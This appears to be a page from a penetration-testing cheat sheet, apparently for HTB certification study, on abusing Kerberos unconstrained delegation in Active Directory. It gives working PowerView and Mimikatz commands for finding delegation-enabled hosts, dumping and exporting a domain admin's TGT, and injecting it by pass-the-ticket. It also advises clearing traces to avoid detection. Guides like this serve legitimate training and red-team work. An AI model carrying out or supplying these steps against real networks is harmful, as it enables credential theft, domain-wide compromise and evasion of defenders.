search
AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA

🟒Unconstrained Delegation

hashtag
Discover domain computers that have unconstrained delegation

Domain Controllers always show up, ignore them

 . .\PowerView_dev.ps1
Get-Netcomputer -UnConstrained
Get-Netcomputer -UnConstrained | select samaccountname

hashtag
Check if any DA tokens are available on the unconstrained machine

Wait for a domain admin to log in while checking for tokens

Invoke-Mimikatz -Command '"sekurlsa::tickets"'

hashtag
Export the TGT ticket

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

hashtag
Reuse the TGT ticket

Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'

Confirm Success of Ticket Injection

After importing the TGT ticket to the current session, check if it was successful:

klist

This command will list all tickets in the cache, and you should see the injected TGT.

Access Resources with Elevated Privileges

Now that you have a valid TGT of a domain administrator, you can access resources on the domain that require DA privileges.

This command will list all domains and servers that the user has access to in the network.

hashtag
Clean up Traces

It's important to remove traces of the attack to avoid detection.

This command purges all Kerberos tickets from the cache, including the injected TGT ticket.

PreviousSet SPNNextConstrained Delegation

Last updated